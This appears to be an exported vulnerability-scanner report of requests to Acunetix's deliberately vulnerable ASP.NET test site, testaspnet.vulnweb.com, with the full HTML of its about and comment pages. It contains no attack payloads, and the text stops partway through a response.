Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13859
Response Body - size: 13,859 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=2
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14397
Response Body - size: 14,397 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 